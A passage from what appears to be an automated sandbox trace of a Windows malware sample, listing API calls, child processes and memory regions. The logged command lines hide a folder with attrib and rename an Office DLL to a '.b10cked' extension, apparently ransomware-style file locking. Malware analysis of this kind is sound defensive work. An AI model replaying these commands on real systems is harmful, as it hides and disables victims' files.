[0152.587] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0152.621] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af0d8 | out: lpExitCode=0x1af0d8*=0x0) returned 1 [0152.621] CloseHandle (hObject=0x4c) returned 1 [0152.621] _vsnwprintf (in: _Buffer=0x1af220, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0e4 | out: _Buffer="00000000") returned 8 [0152.621] SetEnvironmentVariableW 
(lpName="=ExitCode", lpValue="00000000") returned 1 [0152.621] GetEnvironmentStringsW () returned 0x302e80* [0152.621] FreeEnvironmentStringsW (penv=0x302e80) returned 1 [0152.621] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.621] GetEnvironmentStringsW () returned 0x302e80* [0152.621] FreeEnvironmentStringsW (penv=0x302e80) returned 1 [0152.621] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af13c | out: lpAttributeList=0x1af13c) [0152.621] GetConsoleTitleW (in: lpConsoleTitle=0x1af520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.622] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.622] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0152.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.622] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.622] GetLastError () returned 0x2 [0152.622] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.622] GetLastError () returned 0x2 [0152.622] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302810 [0152.622] FindClose (in: hFindFile=0x302810 | out: hFindFile=0x302810) returned 1 [0152.622] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0xffffffff [0152.623] GetLastError () returned 0x2 [0152.623] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedbc) returned 0x302810 [0152.623] FindClose (in: hFindFile=0x302810 | out: hFindFile=0x302810) returned 1 [0152.623] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0152.623] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0152.623] GetConsoleTitleW (in: lpConsoleTitle=0x1af2b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.623] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af13c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af204 | out: lpAttributeList=0x1af13c, lpSize=0x1af204) returned 1 [0152.623] UpdateProcThreadAttribute (in: lpAttributeList=0x1af13c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af1fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af13c, lpPreviousValue=0x0) returned 1 [0152.623] GetStartupInfoW (in: lpStartupInfo=0x1af0f8 | out: lpStartupInfo=0x1af0f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0152.623] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0152.623] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, 
lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af198*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1e4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"", lpProcessInformation=0x1af1e4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda4, dwThreadId=0xd54)) returned 1 [0152.625] CloseHandle (hObject=0x4c) returned 1 [0152.625] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0152.626] GetEnvironmentStringsW () returned 0x3038e0* [0152.626] FreeEnvironmentStringsW (penv=0x3038e0) returned 1 [0152.626] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0152.660] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af0d8 | out: lpExitCode=0x1af0d8*=0x0) returned 1 [0152.660] CloseHandle (hObject=0x50) returned 1 [0152.660] _vsnwprintf (in: _Buffer=0x1af220, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0e4 | out: _Buffer="00000000") returned 8 [0152.660] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0152.661] GetEnvironmentStringsW () returned 0x3038e0* [0152.661] FreeEnvironmentStringsW (penv=0x3038e0) returned 1 [0152.661] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.661] GetEnvironmentStringsW () returned 0x3038e0* [0152.661] FreeEnvironmentStringsW (penv=0x3038e0) returned 1 [0152.661] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af13c | out: lpAttributeList=0x1af13c) [0152.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.661] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.661] _get_osfhandle (_FileHandle=1) returned 0x7 
[0152.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.661] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.661] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.661] SetConsoleInputExeNameW () returned 0x1 [0152.661] GetConsoleOutputCP () returned 0x1b5 [0152.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.661] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.662] exit (_Code=0) Process: id = "248" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xc54" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20363 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20364 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20365 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20366 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 20367 
start_va = 0xb40000 end_va = 0xb46fff entry_point = 0xb40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20368 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20369 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20370 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20371 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 20372 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20373 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20374 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20375 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 20376 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20377 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 20378 start_va = 0x6e2b0000 
end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20379 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20380 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20381 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20382 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20383 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20384 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20385 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20386 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 20387 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20388 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20389 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20390 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 20391 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20392 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 311 os_tid = 0xca0 Process: id = "249" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0x56c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xc54" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT 
AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20471 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20472 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20473 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20474 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 20475 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x3f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20476 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20477 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20478 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20479 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 20480 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20481 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 20482 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20483 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20484 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 20485 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 20486 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20487 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20488 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20489 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20490 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20491 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20492 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20493 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20494 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20495 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20496 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20497 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20498 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20499 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20500 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 312 
os_tid = 0xd5c Process: id = "250" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xc54" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20501 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20502 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20503 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20504 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 20505 start_va = 0xc70000 end_va = 0xc76fff entry_point = 0xc70000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20506 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20507 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 
"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20508 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20509 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 20510 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20511 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20512 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20513 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20514 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 20515 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20516 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20517 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20518 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" 
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20519 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20520 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20521 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20522 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20523 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20524 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20525 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20526 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20527 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20528 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 20529 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20530 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 313 os_tid = 0xd54 Process: id = "251" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xe50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20630 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20631 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20632 start_va = 0x40000 end_va = 